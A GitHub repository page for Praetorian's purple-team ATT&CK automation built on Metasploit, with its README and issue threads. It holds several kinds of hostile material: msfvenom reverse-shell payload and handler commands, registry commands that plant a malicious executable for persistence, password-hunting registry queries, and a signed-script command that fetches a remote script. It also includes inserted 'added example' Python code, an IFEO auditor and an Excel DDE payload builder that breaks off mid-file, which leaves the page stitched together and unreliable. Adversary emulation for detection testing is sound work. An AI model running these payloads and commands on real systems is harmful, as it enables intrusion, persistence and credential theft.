
praetorian-inc / purple-team-attack-automation


Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs

License: Other

Dockerfile 0.01% Ruby 82.48% DIGITAL Command Language 0.01% HTML 0.14% C 1.06% Python 0.39% Objective-C 0.02% PowerShell 5.79% Shell 0.03% PostScript 0.01% JavaScript 0.14% Rich Text Format 0.08% AngelScript 0.01% Makefile 0.01% CSS 0.01% PHP 0.01% C# 9.72% C++ 0.02% Assembly 0.09% Batchfile 0.01%

purple-team-attack-automation's Introduction

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

Purple Team ATT&CK™ Automation

At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post modules. As of this release, we've automated a little over 100 TTPs as modules.

Metasploit's advantage is its robust library, capability to interact with operating system APIs, and its flexible license. In addition, we're able to emulate the features of other tools such as in-memory .NET execution via leveraging Metasploit's execute_powershell functionality. This allows Blue Teams to ensure that their tools are alerting on the actual TTP behavior and not execution artifacts (such as encoded PowerShell).

Our solution is built on top of the latest version of Metasploit as of 09Apr2019 (pulled from: https://github.com/rapid7/metasploit-framework). We’ve made minor modifications to Metasploit’s code base to enable some of the automation. Everything should work as intended if you’re already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.

We're open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.

Wiki

For detailed operational usage guidance and a full list of modules and changes, please view the GitHub Wiki.

Quickstart

Quick start video guide: https://youtu.be/o3Qb_0clIpg

Installation should follow the instructions for installing a Metasploit Docker environment: https://github.com/rapid7/metasploit-framework/tree/master/docker

In general:

  • Install Docker
  • git clone https://github.com/praetorian-code/purple-team-attack-automation.git
  • Edit ./docker-compose.local.override.yml to reflect the LHOST of your local system, similar to the example below. By default, port 4444 will be forwarded to the docker container. If you want to use other ports, for instance to mirror HTTPS, you'll have to add them to this file.
version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 10.0.8.2
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
  • Add / Remove further ports or IP addresses as you see fit. Don't forget to change the LHOST to your own IP address.
  • Make sure you set LHOST to a valid hostname that resolves to your host machine.
  • Now you need to set the COMPOSE_FILE environment variable to load your local override.
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
  • docker-compose build
  • Start the container with ./docker/bin/msfconsole
  • Generate a Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
  • Start and run a local listener (the handler's PAYLOAD must match the architecture of the msfvenom payload above, here x64):
 use exploit/multi/handler
 set PAYLOAD windows/x64/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z

Copy and run meterpreter.exe on the target (“victim”) host as admin and wait for a session.

  • Run a TTP as a post-exploitation module. The list of modules is provided below. For example, to start the 'Credential Dumping (T1003)' module, run:
use modules/post/windows/purple/t1003
info
set session 1
run

Meterpreter Payloads

Praetorian recommends you utilize the nightly installers in order to run msfvenom to create your payloads.

Common Errors

ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

Solved by

service docker start

Future Work

  • Integrate the container into a fork of DetectionLab
  • Compare execution of CALDERA and MSF and how artifacts differ so we can improve adversary emulation
  • Leverage the MSFRPCD to facilitate automatic attack chaining

Contact

If you're interested in our Purple Team services, please contact us online or read more about "Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too".

If you're an engineer looking to join our great team, we have openings at our careers page.

Contributing

See the Contribution Guide for a step-by-step guide to making a module.

Also, follow the Metasploit Framework's general contributing guidelines.

Acknowledgements

We'd like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.

At Praetorian, the following engineers helped contribute modules:

  • Josh Abraham jabra [at] spl0it.org and @jabra
  • Abraham Adberstein
  • Tanner Harper
  • Thomas Hendrickson github.com/tomis007
  • George Jouldjian
  • Dallas Kaman
  • Blake Luther
  • Matt Schneider
  • Matthew Verrette
  • Daniel Wyleczuk-Stern @daniel_infosec


purple-team-attack-automation's Issues

1st install Docker-compose.override.yml

Cannot go any further install of docker build-
I am sure it is me... but point me in the right direction?
KALI: 18.2 Clean image with fresh update of everything as of today

Error:
root@kali:~/purple-team-attack-automation# docker-compose build
ERROR: yaml.parser.ParserError: while parsing a block mapping
in "././docker-compose.override.yml", line 4, column 5
expected , but found ''

My file looks like this:
version: "3"
services:
ms:
build:
context: .
dockerfile: ./Dockerfile
args:
BUNDLER_ARGS: --jobs=8
image: metasploit:dev
environment:
LHOST: 10.0.4.253
ports:
- 8080:8080
- 443:443
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
volumes:
- .:/usr/src/metasploit-framework

When I completed the file, I rewrote the ENV file:
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env

NO JOY.

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

Metasploit is working fine
=[ metasploit v5.0.66-dev

I installed Metasploit with:

OS

KALI 18
What OS are you running Metasploit on?

T1183W - Image File Execution Options Injection

Description

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., "C:\dbg\ntsd.exe -g notepad.exe"). [1]

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [2] IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable>, where <executable> is the binary on which the debugger is attached. [1]

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). [3] [4] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit. [3] [4]

An example where the evil.exe process is started when notepad.exe exits: [4]

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [5] Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. [6] [7]

References

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1183/T1183.md

https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/sticky_keys.rb
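As an added defender-side example (not part of this issue or the project's modules), the following Python parses a `reg export` text dump and flags the Image File Execution Options and SilentProcessExit entries described above, reporting whether GlobalFlag, ReportingMode and MonitorProcess all line up so the monitor actually fires. The sample export, including the mspaint.exe and calc.exe entries, is constructed; decode a real export with 'utf-16' before passing it in.

```python
"""Audit a `reg export` text dump for the IFEO / SilentProcessExit pairing from T1183 (sample data constructed)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# GlobalFlag bit 0x200 (decimal 512, the write-up's first `reg add`) is FLG_MONITOR_SILENT_PROCESS_EXIT.
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200
# ReportingMode bit 0x1: launch MonitorProcess when the image exits silently.
LAUNCH_MONITOR_PROCESS = 0x1

IFEO_MARKER = "\\CurrentVersion\\Image File Execution Options\\"
SPE_MARKER = "\\CurrentVersion\\SilentProcessExit\\"

# Constructed export: the three values from the issue, a Debugger value (ntsd.exe example), and a stale MonitorProcess.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\temp\\evil.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe]
"Debugger"="C:\\dbg\\ntsd.exe -g"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe]
"MonitorProcess"="C:\\temp\\leftover.exe"
"""

_SECTION_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|@)=(?P<data>.*)$')


def _unescape(s: str) -> str:
    # .reg strings escape backslash and double quote with a leading backslash.
    return re.sub(r"\\(.)", r"\1", s)


def _decode_data(data: str) -> object:
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return _unescape(data[1:-1])             # REG_SZ
    if data.startswith("dword:"):
        return int(data[len("dword:"):], 16)     # REG_DWORD (8 hex digits)
    return data                                  # hex(...) and other types: kept raw


def parse_reg_export(text: str) -> dict[str, dict[str, object]]:
    """Map each [key] section to its {value name: decoded data}.
    Real exports are UTF-16LE with a BOM: decode with 'utf-16' before calling."""
    keys: dict[str, dict[str, object]] = {}
    current: dict[str, object] | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if m := _SECTION_RE.match(line):
            current = keys.setdefault(m.group("key"), {})
        elif current is not None and (m := _VALUE_RE.match(line)):
            name = "@" if m.group("name") is None else _unescape(m.group("name"))
            current[name] = _decode_data(m.group("data"))
    return keys


@dataclass(frozen=True)
class Finding:
    image: str    # executable the IFEO / SilentProcessExit subkey targets
    kind: str     # "ifeo_debugger" or "silent_exit_monitor"
    detail: str   # debugger command line or monitor process path
    armed: bool   # silent_exit_monitor: GlobalFlag 0x200 and ReportingMode bit 0x1 both set


def audit_ifeo(text: str) -> list[Finding]:
    keys = parse_reg_export(text)
    findings: list[Finding] = []
    global_flags: dict[str, int] = {}
    for key, values in keys.items():
        if IFEO_MARKER in key:
            image = key.rsplit("\\", 1)[1].lower()
            flag = values.get("GlobalFlag")
            if isinstance(flag, int):
                global_flags[image] = flag
            debugger = values.get("Debugger")
            if isinstance(debugger, str) and debugger:
                # A Debugger value is prepended to the image's command line on every launch.
                findings.append(Finding(image, "ifeo_debugger", debugger, True))
    for key, values in keys.items():
        if SPE_MARKER in key:
            image = key.rsplit("\\", 1)[1].lower()
            monitor = values.get("MonitorProcess")
            if not isinstance(monitor, str) or not monitor:
                continue
            mode = values.get("ReportingMode", 0)
            armed = bool(global_flags.get(image, 0) & FLG_MONITOR_SILENT_PROCESS_EXIT) and \
                isinstance(mode, int) and bool(mode & LAUNCH_MONITOR_PROCESS)
            findings.append(Finding(image, "silent_exit_monitor", monitor, armed))
    return sorted(findings, key=lambda f: (f.image, f.kind))
```

Calling `audit_ifeo(SAMPLE_REG_EXPORT)` reports notepad.exe as armed, calc.exe as an unarmed leftover (no GlobalFlag), and the mspaint.exe Debugger value for review; an entry left behind after a module's cleanup shows up the same way.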

T1044W-Fix

I don't think the MSF module does the right TTP. See about migrating this to a PowerUp function? May need to do some more research for a better way to execute this.

T1134W - Access Token Manipulation

Description

Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. [1]

Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. [2]

Access tokens can be leveraged by adversaries through three methods: [3]

Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.

Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.

Make and Impersonate Token - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.

Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.

Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. [4] The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. [5]

Plan

Utilize built-in MSF functionality

Unable to make Metasploit work with docker

Container is getting closed after some time

Here is my docker-compose.yml

version: '3'
services:
  metasploit:
    image: metasploitframework/metasploit-framework:latest
    container_name: metasploit
    environment:
      DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
    links:
      - db
    ports:
      - 4444:4444
    # volumes:
    #   - ./.msf4:/home/msf/.msf4

  db:
    image: postgres:10-alpine
    container_name: postgres
    restart: always
    environment:
      # POSTGRES_DB: msdb
      # POSTGRES_USER: msuser
      # POSTGRES_PASSWORD: msuser
      PGDATA: /var/lib/postgresql/data/pgdata
      POSTGRES_HOST_AUTH_METHOD: trust
    volumes:
      - pg_data:/var/lib/postgresql/data/pgdata
    ports:
      - "5432:5432"
volumes:
  pg_data:
    driver: local

Question: Docker compose files (.yml and .override.yml) are different than the readme

Steps to reproduce

When pulling the repository there are two docker-compose files.

  1. docker-compose.yml
version: '3'
services:
  ms:
    image: metasploitframework/metasploit-framework:latest
    environment:
      DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
    links:
      - db
    ports:
      - 4444:4444
    volumes:
      - $HOME/.msf4:/home/msf/.msf4

  db:
    image: postgres:10-alpine
    volumes:
      - pg_data:/var/lib/postgresql/data

volumes:
  pg_data:
    driver: local
  2. docker-compose.override.yml
version: '3'

services:
  ms:
    build:
      context: .
      dockerfile: ./Dockerfile
      args:
        BUNDLER_ARGS: --jobs=8
    image: metasploit:dev
    environment:
      DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
    volumes:
      - .:/usr/src/metasploit-framework

The README info (which seems to be a mix of both):

version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: [Your system's IP address]
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443

Which file should I use to add the LHOST to?
Also the ports component is in the standard docker-compose.yml file. Do I need to add ports there or add ports to the .override.yml file?

I'm trying to be as clear as possible, lol, but if you're not understanding, let me know.

thank you!

Issue with FROM ruby:2.6.2-alpine3.9 AS builder - RHEL 7.4

Steps to reproduce

While running docker-compose build I get the following error:

Step 1/35 : FROM ruby:2.6.2-alpine3.9 AS builder
ERROR: Service 'ms' failed to build: Error parsing reference: "ruby:2.6.2-alpine3.9 AS builder" is not a valid repository/tag: invalid reference format

Expected behavior

What should happen?

Current behavior

What happens instead?
build fails

OS

RHEL 7.4
Using docker EE

this may be the issue?

T1214W

The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information:

Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
Current User Hive: reg query HKCU /f password /t REG_SZ /s

T1042W

About

When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:

HKEY_CLASSES_ROOT\txtfile\shell\open\command
HKEY_CLASSES_ROOT\txtfile\shell\print\command
HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.

Instructions

Modify [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt to open with calc.exe instead of notepad.exe, confirm the change was made, and then default to change back (cleanup option)

Also test with the assoc command

Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.md

T1034W-Fix

T1034 currently gets flagged by AV since it uses an MSF post module. Look at modifying the payload or using a PowerUp script

T1004 - Winlogon Helper DLL

Steps to reproduce

Run the winlogon helper DLL module when the keys don't exist

Expected behavior

Success will be reported but it won't modify the keys as they don't exist

Current behavior

Provide an option to create the keys if they don't exist. If the keys don't exist and it fails to create them, report failure

T1100 - Web Shell

Description

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). [1]

Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

References

https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1100/shells

https://github.com/BlackArch/webshells

Plan

Either enumerate technology or have engineer specify path/payload

error to search purple: just bring me some TTP's

Steps to reproduce

I installed on Kali linux 2020 2a
Downloaded from https://github.com/praetorian-code/purple-team-attack-automation then
I followed the instructions.
I open msfconsole with ./docker/bin/msfconsole and then search "purple" and get a few items; I attach the following errors that occur when I execute the commands.

root@kali:/home/purple-team-attack-automation# ./docker/bin/msfconsole
Starting purple-team-attack-automation_db_1 ... done
[-] ***Rting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***
[-] WARNING! The following modules could not be loaded!
[-] /usr/src/metasploit-framework/modules/post/multi/purple/t1193.rb
[-] Please see /root/.msf4/logs/framework.log for details.

                                                       https://metasploit.com


   =[ metasploit v5.0.69-dev-5e07f93720               ]
+ -- --=[ 1957 exploits - 1093 auxiliary - 442 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

[*] Processing docker/msfconsole.rc for ERB directives.
[*] resource (docker/msfconsole.rc)> Ruby Code (261 bytes)
LHOST => 0.0.0.0
[-] Error while running command db_connect: Failed to connect to the Postgres data service: could not translate host name "db" to address: Name does not resolve

Call stack:
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:2048:in `db_connect_postgresql'
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/db.rb:1832:in `cmd_db_connect'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:56:in `load_resource'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:49:in `<main>'
[*] Reloading modules from all module paths...
[-] Error while running command reload_all: No classes in Msf::Module::Platform::Linux for ,osx!

Call stack:
/usr/src/metasploit-framework/lib/msf/core/module/platform.rb:61:in `find_platform'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:55:in `block in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in `each'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in `new'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in `from_a'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:30:in `transform'
/usr/src/metasploit-framework/lib/msf/core/module.rb:119:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/module/has_actions.rb:6:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/post_mixin.rb:16:in `initialize'
/usr/src/metasploit-framework/modules/post/multi/purple/t1153.rb:9:in `initialize'
/usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in `new'
/usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in `create'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:61:in `block (3 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in `each'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in `block (2 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in `each'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in `block in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in `synchronize'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in `refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/module_manager/cache.rb:124:in `refresh_cache_from_module_files'
/usr/src/metasploit-framework/lib/msf/core/module_manager/reloading.rb:51:in `reload_modules'
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:859:in `cmd_reload_all'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:57:in `load_resource'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:49:in `<main>'

msf5 > search purple

Matching Modules

Name Disclosure Date Rank Check Description


0 auxiliary/admin/smb/smb_connect normal No SMB Connection Utility
1 post/linux/purple/t1016 normal No System Network Configuration Discovery (T1016) Linux - Purple Team
2 post/linux/purple/t1033 normal No System Owner/User Discovery (T1033) Linux - Purple Team
3 post/linux/purple/t1049 normal No System Network Connection Discovery (T1049) Linux - Purple Team
4 post/linux/purple/t1057 normal No Process Discovery (T1057) Linux - Purple Team
5 post/linux/purple/t1069 normal No Permissions Groups Discovery (T1069) Linux - Purple Team
6 post/linux/purple/t1082 normal No System Information Discovery (T1082) Linux - Purple Team
7 post/linux/purple/t1087 normal No Account Discovery (T1087) Linux - Purple Team
8 post/linux/purple/t1107 normal No File Deletion (T1107) Linux - Purple Team
9 post/linux/purple/t1146 normal No Clear Command History (T1146) Linux - Purple Team
10 post/linux/purple/t1201 normal No Password Policy Discovery (T1201) Linux - Purple Team
11 post/multi/purple/t1018 normal No Remote System Discovery (T1018) Linux macOS - Purple Team
12 post/multi/purple/t1046 normal No Network Service Scanning (T1046) All - Purple Team

msf5 >

T1174W - Password Filter DLL

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.

Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.

References
https://attack.mitre.org/techniques/T1174/
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1174/T1174.md

T1216W - Signed Script Proxy Execution

Description

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

T1078W-Fix

Currently the module adds a user.

This should probably do an smb_login with a valid user account to test that authentication logs are working.

T1179W - Hooking

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.

Hooking involves redirecting calls to these functions and can be implemented via:

  • Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. [1] [2]
  • Import address table (IAT) hooking, which uses modifications to a process’s IAT, where pointers to imported API functions are stored. [2] [3] [4]
  • Inline hooking, which overwrites the first bytes in an API function to redirect code flow. [2] [5] [4]
Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.

Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. [6]

Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. [7]

Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1179/T1179.md

T1207W

DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.

https://attack.mitre.org/techniques/T1207/
Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md
Requires DA privileges

T1173W - Dynamic Data Exchange

Description

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. [1] [2] [3]

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands [4] [5], directly or through embedded files [6], and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. [7] DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

Reference

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1173/T1173.md

Plan

Create an Excel DDE file that spawns calc and upload it. Executing it will require an engineer to actually open it and accept the prompts.
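The payload the plan refers to, and the defensive counterpart, as an added example (not code from the Praetorian repo or from Atomic Red Team): `dde_payload` builds the classic `=cmd|'/c <command>'!A0` cell, `build_csv` writes it into a CSV that Excel will evaluate, and `find_dde_cells` / `neutralize_cell` are the checks an export or upload filter would run. The row data and command are constructed for illustration; Word's DDEAUTO field carrier is not covered.

```python
"""Added example, not code from the Praetorian repo: generate the Excel/CSV
DDE cell the plan above describes and, on the defensive side, scan exported
spreadsheet cells for DDE formulas and neutralize them. Payload shape is the
classic `=cmd|'/c <command>'!A0`; all input below is constructed."""
import csv
import io
import re

FORMULA_PREFIXES = ("=", "+", "-", "@")
# =<server>|'<topic>'!<item>: <server> is the program DDE will launch
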